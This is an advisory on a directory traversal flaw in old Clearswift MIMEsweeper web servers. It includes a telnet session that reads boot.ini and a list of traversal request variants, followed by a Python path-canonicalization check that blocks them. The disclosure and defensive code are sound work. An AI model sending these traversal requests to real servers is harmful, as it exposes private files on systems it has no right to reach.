MIMEsweeper is "a family of products designed to implement email and web communications e-policies. MIMEsweeper delivers the capabilities for organizations to protect themselves against email and web based threats, meet legal and regulatory requirements, implement productivity saving policies and manage the intellectual property passing through their network".
A directory traversal vulnerability in the product allows attackers to retrieve files that would otherwise be inaccessible.
Credit:
The information has been provided by Pierre Kroma.
Vulnerable Systems:
* Clearswift MIMEsweeper versions prior to 5.0.4
Immune Systems:
* Clearswift MIMEsweeper version 5.0.4 or newer
It is possible to read arbitrary files on the remote server by prepending /foobar/\../\../ to the file name.
Example:
telnet xx.xx.xx.xx 80
Trying xx.xx.xx.xx...
Connected to xx.xx.xx.xx.
Escape character is '^]'.
GET /foobar/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0
HTTP/1.0 200 Ok
Date: Do, 27 Jul 2004 14:30:07 GMT
Server: Clearswift Web Server
Content-length: 186
Content-type: application/octet-stream
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
Connection closed by foreign host.
Here are several examples:
GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar\..\..\..\..\boot.ini HTTP/1.0
Impact:
This vulnerability can be used to retrieve any file from the partition where the Clearswift web server is installed. The number of "/", "\" and ".." sequences needed depends on the ServerRoot setting (the location of the virtual / directory).
Vendor Status:
Clearswift has fixed the vulnerability in version 5.0.4 or newer.
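The request variants listed above differ only in how they mix "/", "\" and "..", so a server-side check has to canonicalize the path with Windows rules before comparing it against ServerRoot. The following Python example is added here for illustration and is not Clearswift's fix or code from the advisory; SERVER_ROOT and resolve() are assumed names, and the function goes slightly beyond the advisory by also percent-decoding the target and rejecting colons.

```python
import ntpath  # Windows path rules, usable on any OS
from urllib.parse import unquote

# Assumed ServerRoot for illustration; the advisory does not state the real one.
SERVER_ROOT = r"C:\Program Files\WebServer\htdocs"

# Request targets copied from the advisory's examples.
ADVISORY_TARGETS = [
    r"/foobar/..\\..\\..\\..\\..\\..\\boot.ini",
    r"/foobar/..\\..\\..\\..\\boot.ini",
    r"/foobar/..\..\..\..\..\..\\boot.ini",
    r"/foobar/..\..\..\..\..\..\boot.ini",
    r"/foobar/\..\..\..\..\..\boot.ini",
    r"/foobar//..\\..\\..\\..\\boot.ini",
    r"/foobar//..\\..//..\\..//boot.ini",
    r"/foobar/\../\../\../\../\boot.ini",
    r"/foobar/../../../../boot.ini",
    r"/foobar\..\..\..\..\boot.ini",
]


def resolve(target, root=SERVER_ROOT):
    """Map a request target to a file path under root; None if it escapes."""
    path = unquote(target.split("?", 1)[0])
    # Treat "/" and "\" alike and drop leading separators, so the join
    # below cannot be reset to the drive root by an absolute-looking path.
    rel = path.replace("/", "\\").lstrip("\\")
    if ":" in rel:  # drive letters and NTFS alternate data streams
        return None
    root = ntpath.normpath(root)
    # normpath collapses doubled separators and resolves every ".." segment.
    full = ntpath.normpath(ntpath.join(root, rel))
    # Containment is decided on the canonical result, never on the raw string.
    base = root.lower()
    if full.lower() != base and not full.lower().startswith(base + "\\"):
        return None
    return full


if __name__ == "__main__":
    for t in ADVISORY_TARGETS + ["/docs/index.html", "/foobar/../index.html"]:
        print(f"{t!r:50} -> {resolve(t)}")
```

Every target from the advisory canonicalizes to a path outside SERVER_ROOT and is refused, while a ".." that stays inside the root is still served.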